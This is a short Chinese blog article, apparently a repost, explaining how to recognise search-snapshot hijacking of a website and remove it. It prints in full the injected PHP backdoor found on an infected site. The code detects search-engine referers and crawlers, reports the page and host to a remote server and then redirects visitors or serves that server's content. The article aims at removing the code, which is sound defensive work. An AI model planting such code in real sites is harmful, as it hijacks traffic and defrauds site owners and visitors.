安基网 首页 安全 安全学院 查看内容

常见网站快照php劫持代码

2018-12-24 02:25| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 网站快照被劫持是个很头疼的事情,有多种,手机端的劫持,电脑端的劫持,甚至还分不同客户端的劫持,发现问题的确不容易。有谷歌手机端,UC客户端,百度客户端等等,小编遇到的就是手机自带的浏览器访问正常,uc和百 ...

网站快照被劫持是个很头疼的事情,有多种,手机端的劫持,电脑端的劫持,甚至还分不同客户端的劫持,发现问题的确不容易。有谷歌手机端,UC客户端,百度客户端等等,小编遇到的就是手机自带的浏览器访问正常,uc和百度的客户端有问题。

特征如下,输入网址关键词百度出来的结果是非法信息,直接输入域名是正常的

点击链接然后跳转到其他地址

这个就是明显的网站快照被劫持了。找到对应代码

set_time_limit(20);
error_reporting(0);
define(u_b,/);
define(s_u,http://xxxxx.com/);
define(s_s,@baidu|so.com|sm.cn|sogou|yahoo|gogle@i);
define(h_t,$_SERVER[SERVER_NAME]);
define(r_s,$_SERVER[HTTP_REFERER]);
define(u_s,$_SERVER[HTTP_USER_AGENT]);
define(h_z,s_p());
function s_p(){
	$d=;
	if(isset($_SERVER[REQUEST_URI])){
		$d=$_SERVER[REQUEST_URI];
	} else{
		if(isset($_SERVER[argv])){
			$d=$_SERVER[PHP_SELF].?.$_SERVER[argv][0];
		} else{
			$d=$_SERVER[PHP_SELF].?.$_SERVER[QUERY_STRING];
		}
	}
	if(isset($_SERVER[SERVER_SOFTWARE]) && false!==stristr($_SERVER[SERVER_SOFTWARE],IIS)){
		if(function_exists(mb_convert_encoding)){
			$d=mb_convert_encoding($d,UTF-8,GBK);
		} else{
			$d=@iconv(GBK,UTF-8,@iconv(UTF-8,GBK,$d))==$d?$d:@iconv(GBK,UTF-8,$d);
		}
	}
	$r=explode(#,$d,2);
	$d=$r[0];
	return $d;
}
function r_s($url){
	$o=array(http => array(method=>"GET",timeout=>8));
	$context=stream_context_create($o);
	$h=file_get_contents($url,false,$context);
	if(empty($h)){
		$h=file_get_contents($url);
	}
	return $h;
}
if(preg_match(s_s,r_s)){
	$d_s=true;
	if(preg_match("@site%3A|inurl%3A@i",r_s)){
		setcookie(xx,h_t,time()+259200);
		$d_s=false;
	}
	if($d_s && empty($_COOKIE[xx])){
		setcookie(xx,h_t,time()+259200);
		$d_u=s_u.?xu=.bin2hex(h_z);
		$d_u.=&ua=.bin2hex(u_s);
		$d_u.=&ad=1&xh=.bin2hex(h_t);
		$d_c=r_s($d_u);
		header("Location: ".$d_c.?.h_t);
		exit;
	}
}
if(strstr(h_z,u_b)){
	if(preg_match(s_s,u_s)){
		$d_u=s_u.?xu=.bin2hex(h_z);
		$d_u.=&xh=.bin2hex(h_t);
		$d_u.=&ua=.bin2hex(u_s);
		$d_c=r_s($d_u);
		echo $d_c;
		exit;
	}
}

删除就可以了。

推荐一个php代码格式化网站

http://tools.jb51.net/code/jb51_php_format


小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6638006675217318403/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部